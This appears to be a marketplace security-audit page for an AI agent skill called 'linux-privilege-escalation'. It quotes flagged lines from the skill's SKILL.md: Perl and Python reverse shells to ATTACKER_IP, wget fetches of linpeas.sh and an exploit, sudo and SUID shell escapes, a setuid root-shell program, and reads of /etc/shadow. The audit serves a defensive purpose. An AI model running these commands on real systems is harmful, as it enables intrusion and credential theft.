Skip to main content

linux-privilege-escalation

Facilitates privilege escalation assessments on Linux systems to identify and exploit security vulnerabilities for root access.

Install this skill

or
0/100

Security score

The linux-privilege-escalation skill was audited on May 22, 2026 and we found 24 security issues across 4 threat categories, including 9 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 425

Direct command execution function call

SourceSKILL.md
425perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("
medium line 233

System command execution

SourceSKILL.md
233sudo awk 'BEGIN {system("/bin/bash")}'
medium line 236

System command execution

SourceSKILL.md
236sudo python -c 'import os; os.system("/bin/bash")'
medium line 256

System command execution

SourceSKILL.md
256system("/bin/bash");
medium line 328

System command execution

SourceSKILL.md
328/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
medium line 372

System command execution

SourceSKILL.md
372# Shows: system("service apache2 start")
medium line 392

System command execution

SourceSKILL.md
392echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
medium line 236

Python os.system command execution

SourceSKILL.md
236sudo python -c 'import os; os.system("/bin/bash")'
medium line 328

Python os.system command execution

SourceSKILL.md
328/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
medium line 419

Python subprocess execution

SourceSKILL.md
419python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
medium line 169

Wget to non-GitHub URL

SourceSKILL.md
169wget http://ATTACKER_IP:8000/linpeas.sh
medium line 205

Wget to non-GitHub URL

SourceSKILL.md
205wget http://ATTACKER_IP/exploit.c
high line 86

Access to /etc/passwd

SourceSKILL.md
86cat /etc/passwd | grep -v nologin | grep -v false
high line 89

Access to /etc/passwd

SourceSKILL.md
89cat /etc/passwd | grep home
high line 239

Access to /etc/passwd

SourceSKILL.md
239sudo less /etc/passwd
high line 299

Access to /etc/passwd

SourceSKILL.md
299base64 /etc/passwd | base64 -d > passwd.txt
high line 312

Access to /etc/passwd

SourceSKILL.md
312# Add to /etc/passwd (using SUID editor)
high line 282

Access to /etc/shadow

SourceSKILL.md
282LFILE=/etc/shadow
high line 298

Access to /etc/shadow

SourceSKILL.md
298base64 /etc/shadow | base64 -d > shadow.txt
high line 477

Access to /etc/shadow

SourceSKILL.md
477$ base64 /etc/shadow | base64 -d
low line 169

External URL reference

SourceSKILL.md
169wget http://ATTACKER_IP:8000/linpeas.sh
low line 205

External URL reference

SourceSKILL.md
205wget http://ATTACKER_IP/exploit.c
low line 223

External URL reference

SourceSKILL.md
223Reference https://gtfobins.github.io for exploitation commands:
low line 429

External URL reference

SourceSKILL.md
429- GTFOBins: https://gtfobins.github.io
Scanned on May 22, 2026
View Security Dashboard
Installation guide →
GitHub Stars 21.5K
Rate this skill
Categorydevelopment
UpdatedMay 26, 2026
frontenddocxgitapitestingdevopsbackendsecurity-engineerdevops-srebackend-developerdevelopment
sickn33/antigravity-awesome-skills